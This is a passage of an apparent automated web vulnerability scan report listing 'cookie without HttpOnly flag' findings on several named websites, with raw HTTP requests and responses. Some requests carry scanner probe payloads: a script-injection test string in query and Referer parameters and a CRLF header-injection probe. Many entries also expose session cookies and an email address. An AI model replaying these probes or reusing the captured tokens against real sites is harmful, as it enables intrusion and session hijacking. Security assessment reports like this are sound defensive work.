User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:23 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=1aeb2eec6fc3d97068100438c4ab3ee3; expires=Sun, 08 May 2011 19:34:23 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:34:23 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=5a5e7a00cb3b96b274ce4d2f25ed918182b81f14d9de53ba4dc443409c5eca8584c97b80; Path=/
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="
...[SNIP]...
18.84. http://www.eneighborhoods.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.eneighborhoods.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:23 GMT
Content-Length: 16989
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCRACBCR=HBFHNDMBEOAHONJPJMPPMKPB; path=/
Cache-control: private
Set-Cookie: TS825c04=b9ea7606891d786e2f985ad797c161079dbfc4768d55116b4dc44124; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="verify-v1"
...[SNIP]...
18.85. http://www.expedia.com/Hotels  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Fri, 06 May 2011 22:42:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=000,; Domain=.expedia.com; Path=/
Set-Cookie: JSESSION=ed861fe0-7e58-4a15-a1dc-ba3f1f9818e7; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; Domain=.expedia.com; Expires=Fri, 06-May-2016 03:46:24 GMT; Path=/
Content-Length: 133396

<!DOCTYPE html>
<html>
   <head>
       <meta name="language" content="en_US"/>
<meta name="robots" content="noydir, noodp"/>
<title>Hotels: Find cheap hotel deals & resorts, make hotel reservations | E
...[SNIP]...
18.86. http://www.expediainc.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expediainc.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.expediainc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 May 2011 02:48:11 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: EXPE_SESSION=1249658160%7C%20%7Bts%20%272011%2D05%2D06%2022%3A48%3A11%27%7D%7C%20%7Bts%20%272011%2D05%2D06%2022%3A48%3A11%27%7D%7C94BA1C6489E4D447C9084B59ADC78D5E;domain=www.expediainc.com;expires=Sun, 06-May-2012 02:48:11 GMT;path=/
Set-Cookie: EXPE_BRIEFCASE=UPDATED%7C40579%2E9501273;domain=www.expediainc.com;expires=Sun, 06-May-2012 02:48:11 GMT;path=/
Set-Cookie: EXPE_PREVIEW=;expires=Fri, 07-May-2010 02:48:11 GMT;path=/
Vary: Accept-Encoding
Content-Length: 8156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml"><head>

<title>Expedia
...[SNIP]...
18.87. http://www.ezflexplan.com/lbmc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ezflexplan.com
Path:   /lbmc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/ HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:36:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2793
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQSRSARR=HADFNNCCODEIFBHJGPCFBEEJ; path=/
Cache-control: private


<html>

<head>
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script LANGUAGE="javascript">
<!--
   var aIm
...[SNIP]...
18.88. http://www.ezflexplan.com/navigation/menu.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /navigation/menu.asp?id=lbmc&email=tmangrum@lbmc.com&content=4e5ba%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb96358f5505 HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=4e5ba%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb96358f5505
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 11:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3032
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQSRSARR=IHEFNNCCEGJCMJNIGILGHNGE; path=/
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...
18.89. http://www.gofileroom.com/SessionRelease.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gofileroom.com
Path:   /SessionRelease.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /SessionRelease.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gofileroom.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 16

[object Object]=

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 971
Content-Type: text/html
Expires: Sat, 07 May 2011 01:44:07 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQARABBTB=JPKJJINBIAOLHOGGNDMBGOOP; path=/
Date: Sat, 07 May 2011 01:45:07 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3325615626.20480.0000; path=/


<html>

<head>
<title>GoFileRoom</title>

<script src="/includes/js/GFRAJAX.js" type="text/javascript"></script>
<script type="text/javascript">

window.setTimeout('closeMe()', 2000);

fun
...[SNIP]...
18.90. http://www.gofileroom.com/lbmc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gofileroom.com
Path:   /lbmc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/ HTTP/1.1
Host: www.gofileroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerGFR_WWW_HTTP=2251873802.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 10672
Content-Type: text/html
Expires: Sat, 07 May 2011 01:43:13 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQQDACQB=MCGPLMNBAICKPDCMOMOHHOLJ; path=/
Date: Sat, 07 May 2011 01:44:13 GMT


<script language="javascript" type="text/javascript">
var protocol = "https://"
var server = "www.gofileroom.com"
var vRoot = ""
var gj= '/lbmc/Default.asp';
var httpAddress = window.location.h
...[SNIP]...
18.91. http://www.gotoassist.com/ph/lbmc  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gotoassist.com
Path:   /ph/lbmc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ph/lbmc HTTP/1.1
Host: www.gotoassist.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:34:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: webVisitor=FirstVisit%3D1304732072155%26LastVisit%3D1304732072155; path=/; expires=Sat, 05-May-2018 01:34:31 GMT
Set-Cookie: webSession=SessionInfo%3D12837598%253ABF71A9BBB1E93CF; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 9084

   
                           <html>
<head>
<meta name="robots" content="noindex,nofollow">
<title>
LBMC Technologies
</title>
</head>
<body bgcolor=#ffffff leftmargin=0 rightmargin=0 topmargin=0 bottommargin=0 marginhe
...[SNIP]...
18.92. http://www.hunton.com/news/uniGC.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uniGC.aspx?xpST=PENSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=1c95740e-93e3-4ab2-893b-b01eb3a4d9a2; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.93. http://www.hunton.com/professionals/uniGC.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=11598f11-187a-435f-b543-d78ee2a48a53; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.94. http://www.hunton.com/services/uniGC.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hunton.com
Path:   /services/uniGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/uniGC.aspx?xpST=ServiceList HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=e6106238-84c2-4133-bcd7-11d59e2420c7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.95. http://www.lbmc.com/about_us  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lbmc.com
Path:   /about_us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/landing/pci.htm?gclid=CPPNuPTV1KgCFeM85QodgmKbjA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.1.10.1304749048

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 07 May 2011 01:14:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2; expires=Mon, 30-May-2011 04:48:12 GMT; path=/; domain=.lbmc.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 07 May 2011 01:14:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://www.lbmc.com/about-lbmc
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

18.96. http://www.lbmctech.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lbmctech.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lbmctech.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:27:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=m3d5l1bt5bgmkn52n0ima4sef3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       <ba
...[SNIP]...
18.97. http://www.linkedin.com/pub/12/7a2/294  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /pub/12/7a2/294

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/12/7a2/294 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
